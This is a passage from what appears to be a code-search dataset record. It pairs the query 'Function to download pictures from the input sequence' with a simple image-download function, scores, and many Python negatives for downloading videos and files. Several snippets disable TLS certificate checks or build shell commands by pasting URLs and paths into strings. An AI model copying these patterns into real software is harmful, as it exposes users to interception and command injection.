SystemExit)):\n # Re-raise interrupts so cleanup code works.\n raise ex\n finally:\n que.task_done()\n\n temp_video_filename = tempfile.mkstemp(prefix= base_filename)[1]\n temp_audio_filename = tempfile.mkstemp(prefix= base_filename)[1]\n\n try:\n que.put((content[0].url, temp_video_filename))\n que.put((content[1].url, temp_audio_filename))\n\n for i in range(2):\n Thread(target= download_in_queue).start()\n\n que.join()\n\n if not exception_queue.empty():\n raise exception_queue.get()\n\n # Now use ffmpeg to join the audio and video content together.\n subprocess.check_call((\n \"ffmpeg\",\n \"-i\", temp_video_filename,\n \"-i\", temp_audio_filename,\n \"-c\", \"copy\", os.path.abspath(video_filename)\n ))\n finally:\n # Clean up temporary files.\n os.remove(temp_video_filename)\n os.remove(temp_audio_filename)\n else:\n # Download one audio-video file.\n download_to_file(video_content.url, video_filename)\n\n # Now write the JSOn file with the metadata.\n with open(json_filename, \"w\") as out_file:\n json.dump({\n \"version\": JSON_FORMAT_VERSION,\n \"content\": (\n [content[0].to_json(), content[1].to_json()]\n if 
isinstance(content, tuple) else\n [content.to_json()]\n ),\n \"feed_item\": feed_item.to_json(),\n }, out_file)\n\n return (video_filename, json_filename)", "async def videos(self, *, key: str, part: List[str], video_ids: List[str],\n max_results: int = 50, page_token: str = None,\n **kwargs):\n params = {\n 'key': key,\n 'id': ','.join(video_ids),\n 'part': ','.join(part),\n 'maxResults': max_results,\n }\n if page_token:\n params['pageToken'] = page_token\n\n return await self._request(kwargs.get('name'), params=params)", "def download_vid(item):\n vid_name, vid_id = item\n vid = Video(vid_name, vid_id, resolution='224p')\n vid.download()", "def run(self):\n urls_to_download = self._get_links()\n results = ThreadPool(8).imap_unordered(self._download_url, urls_to_download)\n for path in results:\n print(path)", "def download_media_from_bandwidth(media_urls):\n downloaded_media_files = []\n for media_url in media_urls:\n media_id = get_media_id(media_url)\n filename = get_media_filename(media_url)\n with open(filename, \"wb\") as f:\n try:\n downloaded_media = messaging_client.get_media(MESSAGING_ACCOUNT_ID, media_id)\n f.write(downloaded_media.body)\n except Exception as e:\n print(e)\n downloaded_media_files.append(filename)\n return downloaded_media_files", "def download_assignments(opener, fasta_fname, interval=3):\n params = {\"file\" : open(fasta_fname, \"rb\") }\n #submit and refresh until processed\n result = opener.open(rdp_base+servlet, params)\n while is_processing(result):\n sleep(interval)\n result = opener.open(rdp_base + check_page)\n\n #download the detailed text result\n result = opener.open(rdp_base + get_download_url(result))\n return result", "def show_video(path: str): \n video_path = sorted(glob(path + \"/*.mp4\"))[-1]\n video = io.open(video_path, 'r+b').read()\n encoded = base64.b64encode(video)\n\n return HTML(data='''<video alt=\"test\" controls>\n <source src=\"data:video/mp4;base64,{0}\" type=\"video/mp4\" /> </video>'''\n .format(encoded.decode('ascii')))", "def download(video_identifier,\n output_filename,\n num_attempts=5,\n url_base='https://www.youtube.com/watch?v='):\n # Defensive argument checking.\n assert isinstance(video_identifier, str), 'video_identifier must be string'\n assert isinstance(output_filename, str), 'output_filename must be string'\n assert len(video_identifier) == 11, 'video_identifier must have length 11'\n\n status = False\n\n if not os.path.exists(output_filename):\n command = [\n 'youtube-dl', '--quiet', '--no-warnings', '--no-check-certificate',\n '-f', 'mp4', '-o',\n '\"%s\"' % output_filename,\n '\"%s\"' % (url_base + video_identifier)\n ]\n command = ' '.join(command)\n print(command)\n attempts = 0\n while True:\n try:\n subprocess.check_output(\n command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError:\n attempts += 1\n if attempts == num_attempts:\n return status, 'Fail'\n else:\n break\n # Check if the video was successfully saved.\n status = os.path.exists(output_filename)\n return status, 'Downloaded'", "def download_urls(urls, path):\n count = 0\n if urls:\n for url in urls:\n try:\n res = requests.get(url, verify=False, stream=True)\n rawdata = res.raw.read()\n with open(os.path.join(path, 'img_' + str(count) + '.jpg'), 'wb') as f:\n f.write(rawdata)\n count += 1\n except Exception as e:\n print('Failed to write rawdata.')\n print(e)", "def download_files():\n #delete old files\n dataPath = Path(Path(os.getcwd()) / \"data\")\n for filename in dataPath.glob(\"*\"):\n os.unlink(filename)\n\n 
#download new files\n print(\"Downloading files...\")\n try:\n os.system(\"kaggle datasets download sudalairajkumar/novel-corona-virus-2019-dataset -f time_series_covid_19_confirmed.csv -p data -q\")\n os.system(\"kaggle datasets download sudalairajkumar/novel-corona-virus-2019-dataset -f time_series_covid_19_deaths.csv -p data -q\")\n os.system(\"kaggle datasets download sudalairajkumar/novel-corona-virus-2019-dataset -f time_series_covid_19_recovered.csv -p data -q\")\n print(\"Downloading files finished\")\n except:\n print(\"Error downloading files\")", "def interactive_download(url, file_path, **kwds):\n\n message = \"Downloading %s =>\\n %s\" % (url, os.path.abspath(file_path))\n\n # get size first just to verify server is listening and the file exists\n size = get_url_download_size(url)\n size_str = si_format(size, suffix='B')\n\n with ProgressBar(message, 1) as prg_bar:\n prg_bar.maximum = size\n\n last_update = time.time()\n last_size = None\n n_chunks = 0\n byte_rate = 0\n integration_const = 1.0\n \n for i, size, err in iter_download_with_resume(url, file_path, **kwds):\n now = time.time()\n complete_str = si_format(i, suffix='B', float_format='f', precision=2)\n total_str = si_format(size, suffix='B', float_format='f', precision=1)\n if err is None:\n if last_size is not None:\n chunk_size = i - last_size\n dt = now - last_update\n byte_rate = (chunk_size / dt) ** integration_const * byte_rate ** (1.0 - integration_const)\n # slower integration as more samples have been collected\n integration_const = max(1e-3, 1.0 / n_chunks)\n n_chunks += 1\n last_update = now\n last_size = i\n\n if byte_rate == 0:\n est_time_str = \"\"\n else:\n est_time = (size - i) / byte_rate\n est_time_str = str(datetime.timedelta(seconds=int(est_time)))\n\n rate_str = si_format(byte_rate, suffix='B/s', float_format='f')\n\n stat_str = '%0.2f%% (%s / %s) %s %s remaining' % (100.*i/size, complete_str, total_str, rate_str, est_time_str)\n else:\n stat_str = '%0.2f%% (%s / %s) [stalled; retrying...] %s' % (100.*i/size, complete_str, total_str, err)\n prg_bar.update(value=i, status=stat_str)", "def url_files_download(url, ext, outdir, check_exist=False, create_dir=False,\n remove_files=False, bar_opt='tqdm'):\n file_msg = fd.Program_Msg(__file__)\n ## Checking for file type\n # 'URL'\n if not isinstance(url, str):\n msg = '{0} `url` ({1}) is not a valid type. It must be a STRING!'\n msg = msg.format(file_msg, type(url))\n raise TypeError(msg)\n # File extension\n if not isinstance(ext, str):\n msg = '{0} `ext` ({1}) is not a valid type. It must be a STRING!'\n msg = msg.format(file_msg, type(ext))\n raise TypeError(msg)\n # Output directory\n if not isinstance(outdir, str):\n msg = '{0} `outdir` ({1}) is not a valid type. It must be a STRING!'\n msg = msg.format(file_msg, type(outdir))\n raise TypeError(msg)\n # `check_exist`\n if not (isinstance(check_exist, bool)):\n msg = '`check_exist` ({0}) must be of `boolean` type!'.format(\n type(check_exist))\n raise TypeError(msg)\n # `create_dir`\n if not (isinstance(create_dir, bool)):\n msg = '`create_dir` ({0}) must be of `boolean` type!'.format(\n type(create_dir))\n raise TypeError(msg)\n # `bar` - Type\n if not (isinstance(bar_opt, str)):\n msg = '`bar_opt` ({0}) must be of `boolean` type!'.format(\n type(bar_opt))\n raise TypeError(msg)\n # Progress bar - Value\n if not (bar_opt in ['tqdm', 'native']):\n msg = '{0} `bar_opt` ({1}) is not a valid option! 
Exiting'\n msg = msg.format(file_msg, bar_opt)\n raise LSSUtils_Error(msg)\n ##\n ## List of files in the URL\n files_arr = url_file_list(url, ext)\n # Creating directory\n if create_dir:\n cfutils.Path_Folder(outdir)\n # Check for its existence\n if check_exist:\n if not (os.path.exists(outdir)):\n msg = '`outdir` ({0}) was not found!'.format(\n outdir)\n raise FileNotFoundError(msg)\n ##\n ## Downloading files to output directory\n if len(files_arr) > 0:\n if (bar_opt == 'tqdm'):\n tqdm_desc = 'Downloading files: '\n for file_ii in tqdm(files_arr, desc=tqdm_desc):\n # Local file\n file_ii_local = os.path.join( outdir,\n os.path.basename(file_ii))\n # Checking if local file exists\n if os.path.exists(file_ii_local):\n if remove_files:\n os.remove(file_ii_local)\n wget_opt = True\n else:\n wget_opt = False\n else:\n wget_opt = True\n ##\n ## Only downloading if necessary\n if wget_opt:\n wget.download(file_ii, out=outdir, bar=None)\n elif (bar_opt == 'native'):\n for file_ii in files_arr:\n # Local file\n file_ii_local = os.path.join( outdir,\n os.path.basename(file_ii))\n # Checking if local file exists\n if os.path.exists(file_ii_local):\n if remove_files:\n os.remove(file_ii_local)\n wget_opt = True\n else:\n wget_opt = False\n else:\n wget_opt = True\n ##\n ## Only downloading if necessary\n if wget_opt:\n wget.download(file_ii, out=outdir)\n else:\n msg = '{0} Number of files is ZERO!'.format(file_msg)\n print(msg)", "def merge(vidlist,weekNumber):\n #generate day for file name\n today = date.today()\n d = today.strftime(\"%Y_%m_%d\")\n #resizing video\n clips = []\n for vid in vidlist:\n if vid.endswith(\".mp4\"):\n video = VideoFileClip(vid)\n ratio = video.h / video.w\n if ratio < (16/9 - 0.01):\n video = video.resize(width=1080)\n else:\n video = video.resize(height=1920)\n clips.append(video)\n finalrender = concatenate_videoclips(clips,method='compose')\n finalrender.write_videofile(str(weekNumber)+'.mp4',codec='libx264')", "def capture_timelapse(self, count, interval):\n filename = self.get_new_photo_filename('_{0:03d}_{1:03d}')\n for i in range(count):\n open(self.camid + '/' + filename.format(i, count), 'wb').write(\n self.fake_shot)\n time.sleep(interval)\n return filename.format(0, count)", "def request_videos(query, API_KEY, publishedBefore, publishedAfter, maxResults=49, driver_path=\"C:/WebDriver/bin/chromedriver.exe\"):\n \n video_list = yt_search(query, API_KEY, publishedBefore, publishedAfter, maxResults)\n \n # Check if there are no video results\n if not video_list:\n return\n \n for video in video_list:\n video['query'] = query\n return video_list", "async def download_files(self, download_path):\n\n async with vt.Client(self.apikey) as client:\n while True:\n file_hash = await self.queue.get()\n file_path = os.path.join(download_path, file_hash)\n with open(file_path, \"wb\") as f:\n await client.download_file_async(file_hash, f)\n self.queue.task_done()", "def execution(path_channel_data_base_json, path_playlist_ids_json, latest_date, oldest_date, api_service,\n selected_category, short_vid_index, long_vid_index, min_dur_long_vid=10, delay=True):\n today_date = datetime.today()\n\n log = f\"Date of execution: {today_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Latest Date: {latest_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Oldest Date: {oldest_date:%Y-%m-%d %H:%M:%S}\\n\\n\"\n\n print(log)\n\n music_channels = get_channel_list(path_channel_data_base_json, category=selected_category)\n playlist_ids = read_json(path_playlist_ids_json)\n\n all_vid = get_all_videos(music_channels, 
latest_date=latest_date, oldest_date=oldest_date, api_service=api_service)\n log += f'{all_vid[\"log_str\"]}\\n'\n\n duration_list = api_get_videos_duration(all_vid[\"all_video_ids\"], api_service)\n\n duration_filter_dict = duration_filter(duration_list, minute_threshold=min_dur_long_vid)\n log += f'{duration_filter_dict[\"logs\"]}\\n'\n\n print(\"Adding videos into playlists...\\n\")\n log += \"Adding videos into playlists...\\n\\n\"\n\n log_short_vid_text = api_add_to_playlist(playlist_ids[short_vid_index], duration_filter_dict[\"short_videos\"],\n api_service, delay=delay)\n log += f'{log_short_vid_text}\\n'\n\n log_long_vid_text = api_add_to_playlist(playlist_ids[long_vid_index], duration_filter_dict[\"long_videos\"],\n api_service, delay=delay)\n log += f'{log_long_vid_text}\\n'\n\n print(\"- ALL DONE! -\\n\")\n log += \"- ALL DONE! -\\n\"\n\n log += f\"\\n{clean_logs('../Logs')}\"\n\n with open(f'../Logs/Log_{today_date:%Y-%m-%d_%H.%M.%S}.txt', 'w', encoding=\"utf-8\") as file:\n file.write(log)\n\n sleep(5)\n\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[short_vid_index]}\")\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[long_vid_index]}\")", "def get_video_urls(self, kulu_id, retry=True):\n mp4_url = None\n hls_url = None\n if (kulu_id):\n def fetch_kulu_urls(kulu_id):\n mp4_url = None\n hls_url = None\n kulu_valley_kulus_url = \"https://imd.kuluvalley.com/api/2.1/rest/kulus/\"\n r = requests.get(kulu_valley_kulus_url + kulu_id)\n if (r.status_code == requests.codes.ok):\n o = r.json()\n variants = o[\"kulu\"][\"media\"][\"variants\"]\n for variant in variants:\n if (variant[\"formatCode\"] == \"hls_default\"):\n hls_url = variant[\"url\"]\n if (variant[\"formatCode\"] == \"mobile_mp4\"):\n mp4_url = variant[\"url\"]\n\n log.info(\"hls_url = %s\", hls_url)\n log.info(\"mp4_url = %s\", mp4_url)\n r.raise_for_status()\n return mp4_url, hls_url\n\n log.info(\"getting kulu valley urls\")\n mp4_url, hls_url = fetch_kulu_urls(kulu_id)\n\n if retry:\n retry_count = 1\n max_retries = 1\n while (retry_count <= max_retries and (mp4_url is None or hls_url is None)):\n log.info(\"getting kulu valley urls: retry %d\", retry_count)\n sleep_for = 2 ** (retry_count-1) # 1, 2, 4.. 
seconds\n log.info(\"sleeping for %.1f seconds\", sleep_for)\n time.sleep(sleep_for)\n mp4_url, hls_url = fetch_kulu_urls(kulu_id)\n retry_count += 1\n\n return mp4_url, hls_url", "def get_video_as_images():\n experiments = ['me1.mp4']\n try:\n if (os.path.isdir(\"dump\")):\n shutil.rmtree('dump')\n except OSError:\n print (\"Deletion of the directory failed\")\n exit()\n os.system('mkdir dump')\n for experiment in experiments:\n exp_no_ext = experiment.split('.')[0]\n subdir_cmd = \"dump/{0}\".format(exp_no_ext)\n os.mkdir(subdir_cmd)\n os.system('ffmpeg -i videos/%s dump/%s/%s%%03d.jpg' % (experiment, exp_no_ext, exp_no_ext))\n run_all(exp_no_ext)", "def download_remote_files(output_dir, files):\n logging.debug(f\"Try to download files: {files}\")\n\n # Create list of remote and local files\n base_url = \"https://storage.googleapis.com/\"\n urls = [base_url+file for file in files]\n local_files = [output_dir + file.split(\"/\")[-1] for file in files]\n\n\n async def get(session, url, local_f):\n if os.path.isfile(local_f):\n logging.info(\"Raw file {} exists locally\".format(local_f))\n pass\n else:\n # Download file\n async with session.get(url=url) as response:\n if response.status == 200:\n resp = await response.read()\n with open(local_f, \"wb\") as outfile:\n outfile.write(resp)\n\n\n async def main(urls, local_files):\n conn = aiohttp.TCPConnector(limit=30)\n timeout = aiohttp.ClientTimeout(total=None, connect=None, sock_connect=30, sock_read=10)\n async with aiohttp.ClientSession(connector=conn, timeout=timeout) as session:\n _ = await asyncio.gather(*[get(session, urls[f], local_files[f]) for f in range(len(urls))])\n\n asyncio.run(main(urls, local_files))\n return local_files", "def ssh_download_files(data):\n with _ssh_connect() as ssh:\n with ssh.open_sftp() as sftp:\n with click.progressbar(data, label='downloads') as items: # noqa\n for item in items:\n _, filename = os.path.split(item)\n sftp.get(item, f'{DOWNLOAD_DIR}/{filename}')", "def build_extracted_list(input_list, subinterval):\n out = []\n wait = subinterval\n for i in input_list:\n if wait == subinterval:\n out.append(i)\n wait = 0\n else:\n wait += 1\n return out", "def download_songs(playlist_url):\n command_string = 'youtube-dl -x --audio-format wav --postprocessor-args \"-ar 44100 -ac 1\" --output \"Songs/%(' \\\n 'title)s_%(id)s.%(ext)s\" ' + \\\n playlist_url\n args = shlex.split(command_string)\n subprocess.call(args)", "def videoIndexFile(request, flightName=None, sourceShortName=None, segmentNumber=None):\n\n # use regex substitution to replace hostname, etc.\n forceEndlistArg = request.GET.get('forceEndlist', None)\n forceEndlist = True if forceEndlistArg else False\n (indexFileContents, indexFilePath) = util.getIndexFileContents(flightName, sourceShortName,\n segmentNumber, forceEndlist=forceEndlist)\n if not indexFileContents:\n return JsonResponse({'status': 'fail', 'exception': 'NO INDEX FILE CONTENTS'}, status=406)\n # return modified file in next line\n response = HttpResponse(indexFileContents, content_type=\"application/x-mpegurl\")\n content_disposition = 'filename = \"%s\"' % os.path.basename(indexFilePath)\n response['Content-Disposition'] = content_disposition\n return response", "def download_pics(pics_links):\n\n for link in range(len(pics_links)):\n r = requests.get(pics_links[link][0])\n with open(os.path.join(\"tmp\", f\"{link}.jpg\"), \"wb\") as dl:\n dl.write(r.content)", "def download_ostrich_video(download_to_path):\n urlretrieve(REMOTE_OSTRICH_VID_PATH, download_to_path)", "def 
save_link_time(return_list, path_to_download):\n\n # Opens a new file and writes lines to it and saves it at the spot provided\n with open(os.path.join(path_to_download, \"yt_vids.txt\"), \"w\") as w:\n w.write('\\n'.join('{} {} {}'.format(\n x[0], x[1][0], x[1][1]) for x in return_list))", "def download_vid(vid_link, quality_num=None):\r\n if quality_num is not None:\r\n # if quality_num provided\r\n try:\r\n os.system(\"youtube-dl -f \"+str(quality_num)+\" \\'\"+str(vid_link)+\"\\'\")\r\n except Exception:\r\n print(Exception)\r\n else:\r\n # by default the best quality is downloaded\r\n try:\r\n os.system(\"youtube-dl \"+str(vid_link))\r\n except Exception:\r\n print(Exception)", "def generate_video_from_frames(path_to_frames, title):\r\n mean_height = 0\r\n mean_width = 0\r\n num_of_images = load_one_setting(settings_filename, 'MAX_CYCLES')\r\n os.chdir(path_to_frames)\r\n '''Loading all frames'''\r\n for file in os.listdir('.'):\r\n if file.endswith(\".jpg\") or file.endswith(\".jpeg\") or file.endswith(\"png\") or file.endswith(\"JPEG\"):\r\n im = Image.open(file)\r\n width, height = im.size\r\n mean_width += width\r\n mean_height += height\r\n\r\n mean_width = int(mean_width / num_of_images)\r\n mean_height = int(mean_height / num_of_images)\r\n\r\n for file in os.listdir('.'):\r\n if file.endswith(\".jpg\") or file.endswith(\".jpeg\") or file.endswith(\"png\") or file.endswith(\"JPEG\"):\r\n im = Image.open(file)\r\n imResize = im.resize((mean_width, mean_height), Image.ANTIALIAS)\r\n imResize.save(file, 'JPEG', quality=95)\r\n release_video(title)\r\n os.chdir(r'../..')", "def split_video_random(file_path, start_pos, split_length, out_path):\n s_cmd = \" -i '%s'\"%(file_path) #use default CODEC\n try:\n\tfileext = file_path.split(\".\")[-1]\n except IndexError as e:\n\traise IndexError(\"No ext. in filename. 
Error: \" + str(e))\n\n split_start = start_pos\n split_length = split_length\n head, tail = os.path.split(file_path)\n name, ext = tail.split('.')\n filebase=name+'_'+str(start_pos)+'-'+str(split_length)\n\n dstfilebase = out_path + '/' + filebase # create output file base\n\n #split_str = \"\"\n #split_str += \" -ss \" + str(split_start) + \" -t \" + str(split_length) + \" '\"+ dstfilebase + \".\" + fileext + \"'\"\n\n s_str = \"\"\t\n #s_str += \"ffmpeg\"+\" -ss \"+str(split_start)+\" -t \"+str(split_length) + s_cmd + \" '\"+dstfilebase + \".\" + fileext + \"'\"\n s_str += \"ffmpeg\" + \" -ss \" + str(split_start) + s_cmd + \" -t \" + str(split_length) + \" '\"+ dstfilebase + \".\" + fileext + \"'\"\n print(\"########################################################\")\n #print \"About to run: \"+split_cmd+split_str\n print(\"About to run: \"+s_str)\n print(\"########################################################\")\n #output = subprocess.Popen(split_cmd+split_str, shell = True, stdout = subprocess.PIPE).stdout.read()\n output = subprocess.Popen(s_str, shell=True, stdout=subprocess.PIPE).stdout.read()", "def death_as_a_service(vid_path='vids', max_downloads=4,\n to_imgur=False, to_tumblr=True, to_snapchat=True):\n print \"Fetching new videos and consolidating queue...\"\n yt.populate_queue()\n yt.dl(max_downloads)\n extract_and_upload(vid_path, to_imgur=to_imgur,\n to_tumblr=to_tumblr, to_snapchat=to_snapchat)", "def test_task_video_download(url_to_video: str, empty_video_resource: VideoResource):\n download_video(url_to_video, empty_video_resource.id)\n empty_video_resource.refresh_from_db()\n video_instance = empty_video_resource.videos.filter(primary=True).first()\n\n assert empty_video_resource.videos.all()\n assert video_instance.extension == 'mp4'\n assert video_instance.primary\n for item in video_instance.video.open():\n assert item", "def download_clips(data: dict, length: float, path: str) -> list:\r\n amount = 0\r\n length *= 60\r\n names = []\r\n\r\n for clip in data:\r\n\r\n download_clip(data[clip][\"url\"], path)\r\n length -= data[clip][\"duration\"]\r\n\r\n name = data[clip][\"display_name\"]\r\n amount += 1\r\n\r\n if name not in names:\r\n names.append(name)\r\n\r\n log.info(f\"Remaining video length: {ceil(length)} seconds.\\n\")\r\n\r\n # If the rendered video would be long enough\r\n # we break out of the loop, else continue\r\n if length <= 0:\r\n break\r\n\r\n # If the rendered video would be long enough or we\r\n # have ran out of clips, we return the streamer names\r\n log.info(f\"Downloaded {amount} clips.\\n\")\r\n return names", "def main(file_path, urls):\n # format urls input\n with open(urls, 'r') as file:\n urls = file.read().replace('\\n', '')\n\n urls = urls.strip('[]')\n urls = re.findall(r'\\([^\\)\\(]*\\)', urls)\n\n for file in urls:\n\n file_name, url = tuple(file.strip('()').split(', '))\n\n # check if file is already downloaded\n if os.path.exists(os.path.join(file_path, file_name)):\n print(\"%s already exists.\\n\" % file_name)\n continue\n else:\n print(\"Starting download for %s...\\n\" % file_name)\n\n # Create the data subdirectory if it doesn't exist\n os.makedirs(file_path, exist_ok=True)\n\n # create response object\n r = requests.get(url, stream=True)\n widgets = [\"Progress: \",\n progressbar.DataSize(), \"| \",\n progressbar.Timer()]\n bar = progressbar.ProgressBar(widgets=widgets,\n max_value=progressbar.UnknownLength)\n value = 0\n # download started\n with open(os.path.join(file_path, file_name), 'wb') as f:\n for chunk in 
r.iter_content(chunk_size=64*1024):\n if chunk:\n f.write(chunk)\n value += len(chunk)\n bar.update(value)\n\n print(\"\\n%s downloaded!\\n\" % file_name)\n\n print(\"All files downloaded!\")", "def get_files(url, thresholds, resolution, r_factor):\n selection_page = urllib.urlopen(url).read()\n\n threshold = '|'.join(['%s'% t for t in thresholds])\n pattern = '\\s(cullpdb_pc(%s)_res%s_R%s_.*\\d\\.gz)' % (threshold, resolution, r_factor)\n\n files = re.findall(pattern, selection_page)\n\n output = None\n for filename,threshold in files:\n printc('Downloading: %s' % filename)\n #get file\n file = urllib.urlopen(url +'/'+ filename )\n raw = file.read()\n\n #write contents to file\n try:\n output = open(pdb_select_settings.PDB_TMP_DIR+'/'+filename, \"w\")\n output.write(raw)\n\n finally:\n if output:\n output.close()\n\n return files", "def download_clip(row, label_to_dir, trim, trimmed_label_to_dir, count):\n\n label = row['label']\n filename = row['youtube_id']\n time_start = row['time_start']\n time_end = row['time_end']\n\n # if trim, save full video to tmp folder\n output_path = label_to_dir['tmp'] if trim else label_to_dir[label]\n\n ydl_opts = {\n 'format': 'bestvideo[ext=mp4][filesize <? 50M]',\n }\n \n # Don't download if the video has already been trimmed\n has_trim = False\n if trim:\n start = str(time_start)\n end = str(time_end - time_start)\n output_filename = os.path.join(trimmed_label_to_dir[label],\n filename + '_{}_{}'.format(start, end) + VIDEO_EXTENSION)\n\n has_trim = os.path.exists(output_filename)\n\n # Don't download if already exists\n if not os.path.exists(os.path.join(output_path, filename + VIDEO_EXTENSION)) and not has_trim:\n print('Start downloading: ', filename) \n ydl_opts['outtmpl'] = os.path.join(output_path, '%(id)s.%(ext)s')\n \n try:\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([URL_BASE + filename])\n except YoutubeDLError as e:\n print('Download failed for ' + filename)\n log.warning(filename)\n return False\n\n print('Finish downloading: ', filename)\n else:\n print('Already downloaded: ', filename)\n\n if trim:\n # Take video from tmp folder and put trimmed to final destination folder\n # better write full path to video\n\n\n input_filename = os.path.join(output_path, filename + VIDEO_EXTENSION)\n\n if has_trim:\n print('Already trimmed: ', filename)\n else:\n print('Start trimming: ', filename)\n # Construct command to trim the videos (ffmpeg required).\n command = 'ffmpeg -i \"{input_filename}\" ' \\\n '-ss {time_start} ' \\\n '-t {time_end} ' \\\n '-c:v libx264 -c:a copy -threads 1 -y -nostdin ' \\\n '\"{output_filename}\"'.format(\n input_filename=input_filename,\n time_start=start,\n time_end=end,\n output_filename=output_filename\n )\n try:\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n print('Error while trimming: ', filename)\n log.warning(filename)\n return False\n print('Finish trimming: ', filename)\n\n print('Processed %i out of %i' % (count + 1, TOTAL_VIDEOS))", "def downloader(thread_num):\n tid = 'Thread ' + numprefix.format(thread_num) + ': '\n for i in range(thread_num, len(self.titles), thread_count):\n title, link = self.titles[i], self.download_urls[i]\n name = vidprefix.format(i) + ' ' + title + '.mp4'\n tries = 0\n while (not os.path.exists(name) or os.path.getsize(name) == 0) \\\n and tries <= trycount:\n if os.path.exists(name): os.remove(name)\n self.log(tid + 'Calling wget for ' + name)\n subprocess.call(['wget', '--output-document=' + 
name, link])\n tries += 1\n if (not os.path.exists(name) or os.path.getsize(name) == 0):\n self.log(tid + 'wget failed for ' + name)\n else:\n self.log(tid + 'wget successfully downloaded ' + name)", "def download_files(self, inpDate):\n # construct day of year from date\n inpDoY = inpDate.timetuple().tm_yday\n strDoY = str(inpDoY)\n if inpDoY < 10:\n strDoY = \"00\" + str(inpDoY)\n if ( inpDoY > 10) & (inpDoY < 100):\n strDoY = \"0\" + str(inpDoY)\n\n dwnldUrl = self.baseUrl +\\\n \"data_fetch_l1c_imaging_v013?y=\"+\\\n str(inpDate.year) + \"&d=\"+strDoY\n driver = webdriver.Chrome()\n driver.get(dwnldUrl)\n\n try:\n element = WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'output')))\n filesDiv = driver.find_element_by_id(\"output\")\n fileLinks = filesDiv.find_elements_by_css_selector('a')\n for uEl in fileLinks:\n fUrl = uEl.get_attribute('href')\n if \"L1C-2-disk\" not in fUrl:\n continue\n print \"currently downloading-->\", fUrl\n rf = requests.get( fUrl, verify=False )\n currFName = rf.url.split(\"/\")[-1]\n outDir = self.outBaseDir + inpDate.strftime( \"%Y%m%d\" ) + \"/\"\n if not os.path.exists(outDir):\n os.makedirs(outDir)\n with open( outDir + currFName, \"wb\" ) as ssusiData:\n ssusiData.write( rf.content )\n finally:\n driver.quit()", "def extract_videos(download_dir, extract_dir):\n\n filename = os.path.join(download_dir, 'UCF101.rar')\n patoolib.extract_archive(filename, outdir=extract_dir)\n\n # os.remove(filename)\n\n return None" ]
[ "0.6634631", "0.6432747", "0.63896453", "0.6305958", "0.60365444", "0.59619087", "0.5885181", "0.5815725", "0.56896555", "0.5573953", "0.5560245", "0.5557694", "0.55472976", "0.5520894", "0.5493748", "0.5459092", "0.54333603", "0.54173565", "0.54105514", "0.54061747", "0.54023707", "0.5356837", "0.5349421", "0.5303259", "0.52836955", "0.52768236", "0.5275138", "0.52495116", "0.5224876", "0.5218306", "0.52167946", "0.520242", "0.5181545", "0.5180293", "0.5165296", "0.5155829", "0.51550394", "0.5154717", "0.5150425", "0.5146917", "0.513512", "0.51251346", "0.5119905", "0.5110614", "0.51009345", "0.5100899", "0.50952303", "0.5066582", "0.50614774", "0.5056301", "0.5038726", "0.5036382", "0.5032848", "0.5025131", "0.50157905", "0.50124776", "0.5011052", "0.50006753", "0.49994865", "0.4992856", "0.49805388", "0.497642", "0.4975179", "0.4971689", "0.49700418", "0.49532133", "0.49482486", "0.49458724", "0.49344832", "0.4919799", "0.49174953", "0.49105108", "0.49057063", "0.49054143", "0.4892793", "0.48916277", "0.48896477", "0.4885288", "0.48843154", "0.48629534", "0.48505142", "0.48494148", "0.48426855", "0.48341072", "0.48321477", "0.48260036", "0.48219877", "0.48217186", "0.4818734", "0.4814717", "0.48141858", "0.48087275", "0.47986725", "0.47985286", "0.47942868", "0.4789459", "0.4788718", "0.47868714", "0.47848457", "0.47837964" ]
0.79695
0
Function to download pictures from the input sequence
def download_pics(pics_links):
    for link in range(len(pics_links)):
        r = requests.get(pics_links[link][0])
        with open(os.path.join("tmp", f"{link}.jpg"), "wb") as dl:
            dl.write(r.content)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def downloadLocal(url_list,path):\n print(\"You are downloading {} images\".format(parser_arguments().limit),end=\" \");print(\"of {} class.\".format(parser_arguments().classes))\n print(\"Please, be patient :)\")\n for i in range(len(url_list)):\n filename= url_list[i].split(\"/\")[-1] # name of the picture file\n r = requests.get(url_list[i], stream =True)\n print(filename)\n\n with open(filename,'wb') as f : # create the file locally in binary-write mode\n r = requests.get(url_list[i], stream =True)\n shutil.copyfileobj(r.raw, f) #write our image to the file\n shutil.move(filename,path)\n print('Done!')", "def download_urls(urls, path):\n count = 0\n if urls:\n for url in urls:\n try:\n res = requests.get(url, verify=False, stream=True)\n rawdata = res.raw.read()\n with open(os.path.join(path, 'img_' + str(count) + '.jpg'), 'wb') as f:\n f.write(rawdata)\n count += 1\n except Exception as e:\n print('Failed to write rawdata.')\n print(e)", "def download_engine(fcsd): #fcsd = first comic strip date\n\n url_list = get_comic_strip_url(fcsd)\n\n for url in url_list:\n session = requests.Session()\n response = session.get(url)\n download_url = get_image_comic_url(session, response)\n# download_dilbert(session, download_url)\n return download_url", "def download_image(urls):\r\n image_paths = []\r\n\r\n base_url = \"https://classifieds.castanet.net\"\r\n image_directory = os.path.join('C:\\\\', 'users', 'ccholon', 'my documents', 'castanet images')\r\n\r\n for url in urls:\r\n listing_url = base_url + url\r\n image_page = requests.get(listing_url)\r\n image_soup = BeautifulSoup(image_page.text, 'html.parser')\r\n\r\n # find the URL for the listing image\r\n image_element = image_soup.find(name='div', class_='image_container')\r\n image_element = image_element.find(name='img')\r\n image_url = image_element.get('src')\r\n\r\n # download the image\r\n #image = requests.get(image_url, stream=True)\r\n\r\n # save to local directory\r\n #image_file = open(os.path.join(image_directory, os.path.basename(image_url)), 'wb')\r\n #for bytes in image.iter_content(100000):\r\n #image_file.write(bytes)\r\n #image_file.close()\r\n\r\n image_paths.append(os.path.join(image_directory, os.path.basename(image_url)))\r\n\r\n return image_paths", "def downloadImages(self):\n\t\ti = 0\n\t\tfor im in self.images:\n\t\t\t# Let's get the file extension and file name and make the final file path. 
